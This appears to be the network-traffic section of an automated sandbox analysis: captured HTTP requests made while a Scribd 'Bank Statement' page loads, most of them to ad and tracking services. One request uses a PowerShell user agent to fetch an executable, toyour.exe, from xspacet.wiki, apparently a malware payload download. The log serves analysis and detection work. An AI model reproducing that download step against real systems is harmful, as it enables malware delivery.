Source: global trafficHTTP traffic detected: GET /bao-csm/aps-comm/aps_csm.js HTTP/1.1Host: c.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /rules-p-UeXruRVtZz7w6.js HTTP/1.1Host: rules.quantcount.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /configs/0ab198dd-b265-462a-ae36-74e163ad6159 HTTP/1.1Host: config.aps.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /stein/toyour.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: xspacet.wikiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /lb/v1 HTTP/1.1Host: lb.eu-1-id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /websiteconfig?bt_env=prod&o=5714937848528896&w=scribd.com HTTP/1.1Host: btloader.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /inner.html HTTP/1.1Host: m.stripe.networkConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://js.stripe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.scribd.com&url=https://www.scribd.com/document/806838445/Bank-Statement&v=06 HTTP/1.1Host: id.hadron.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: application/jsonAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.04970999037798096 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/1.0/id5-api.js HTTP/1.1Host: cdn.id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /js/pubcid/latest/pubcid.min.js HTTP/1.1Host: secure.cdn.fastclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ima.js HTTP/1.1Host: cdn-ima.33across.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bootstrap/bootstrap.js HTTP/1.1Host: cdn.browsiprod.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /hadron.js?partner_id=474&sync=1&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement HTTP/1.1Host: cdn.hadronid.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /lt/c/16576/sync.min.js HTTP/1.1Host: tags.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel;r=2092930387;labels=title.Bank%20Statement%2Ctitle.Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine%2Ctitle.Bank%20Statement;rf=0;a=p-UeXruRVtZz7w6;url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement;ns=0;ce=1;qjs=1;qv=53b98956-20250121164344;ref=;dst=1;et=1739863020757;tzo=300;ogl=site_name.Scribd%2Ctitle.Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine%2Ctype.website%2Curl.https%3A%2F%2Fwww%252Escribd%252Ecom%2Fdocument%2F806838445%2FBank-Statement%2Ctitle.Bank%20Statement%2Cdescription.Scribd%20is%20the%20world's%20largest%20social%20reading%20and%20publishing%20site%252E%2Cimage.https%3A%2F%2Fimgv2-1-f%252Escribdassets%252Ecom%2Fimg%2Fdocument%2F806838445%2Foriginal%2F9a56996329%2F1%3F%2Cimage%3Aalt.Bank%20Statement%2Cimage%3Awidth.1200%2Cimage%3Aheight.630%2Cimage%3Atype.image%2Fwebp;ses=1df35346-a1f2-4142-bba0-a0239ed727d1;d=scribd.com;uht=2;fpan=1;fpa=P0-761217323-1739863020762;pbc=;gdpr=0;mdl= HTTP/1.1Host: pixel.quantserve.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /lb/v1 HTTP/1.1Host: lb.eu-1-id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /out-4.5.44.js HTTP/1.1Host: m.stripe.networkConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://m.stripe.network/inner.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/p/474 HTTP/1.1Host: p.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=8gkxb6n&ttd_tpi=1&ttd_puid=AU1D-0100-001739863021-EHT1L4CA-5M76&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /profiles_engine/ProfilesEngineServlet?at=39&mi=10&dpi=793790479&pt=17&dpn=1&jsver=5.09&iiqidtype=2&iiqpcid=ae6060b4-7f95-4e11-a45c-624b88212a3a&iiqpciddate=1739863021171&iiqcallcount=0&iiqfailcount=0&iiqnodata=false&iiqlocalstorageenabled=true&tsrnd=526_1739863021172&fbp=137264061&cttl=43200000&rrtt=0&dud=0&abtg=A&iiqppcc=0&vrref=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ref=www.scribd.com HTTP/1.1Host: api.intentiq.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /profiles_engine/ProfilesEngineServlet?at=20&mi=10&secure=1&dpi=793790479&rnd=596237&iiqidtype=2&iiqpcid=ae6060b4-7f95-4e11-a45c-624b88212a3a&iiqpciddate=1739863021171&tsrnd=532_1739863021174&fbp=137264061&vrref=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&jsver=5.09 HTTP/1.1Host: sync.intentiq.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /country?o=5714937848528896 HTTP/1.1Host: api.btloader.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pv?tid=HJzsxlu9-oWwMemKzV-9517ead42a&w=6212136826568704&o=5714937848528896&cv=2.1.75-1-gb0a1279&widget=false&checksum=1639592c&r=false&vr=1232x910&pageURL=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&sid=mZzGHyqA-W1pQwweWv-9517ead42a&pm=false&upapi=true HTTP/1.1Host: api.btloader.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /script/rlink.js?o=5714937848528896&bt_env=prod HTTP/1.1Host: cdn.btmessage.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?https://ids.ad.gt/api/v1/match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&adnxs_id=$UID&gdpr=0 HTTP/1.1Host: secure.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?id=998eaf06-9905-4eae-9e26-9fac75960c53&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fopenx%3Fopenx_id%3D%7BOPENX_ID%7D%26id%3DAU1D-0100-001739863021-EHT1L4CA-5M76%26auid%3DAU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: u.openx.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /supply/v5?sk=d_mapping&pk=scribd&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&bid=kHJlRroopxDWeXouLBrW&at=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&sw=1280&sh=1024&pvid=7ff1df5d-066c-41b7-b458-a21dec070290&l=en HTTP/1.1Host: yield-manager.browsiprod.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/ip_match?id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: ids4.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/UCookieSetPug?rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=audigent_w_appnexus_3985&google_cm&google_sc&google_ula=450542624&id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=3185&partner_device_id=AU1D-0100-001739863021-EHT1L4CA-5M76&partner_url=https://ids.ad.gt%2Fapi%2Fv1%2Ftapad_match%3Fid%3DAU1D-0100-001739863021-EHT1L4CA-5M76%26tapad_id%3D%24%7BTA_DEVICE_ID%7D HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /token?pid=50242&puid=AU1D-0100-001739863021-EHT1L4CA-5M76&gdpr=0 HTTP/1.1Host: token.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
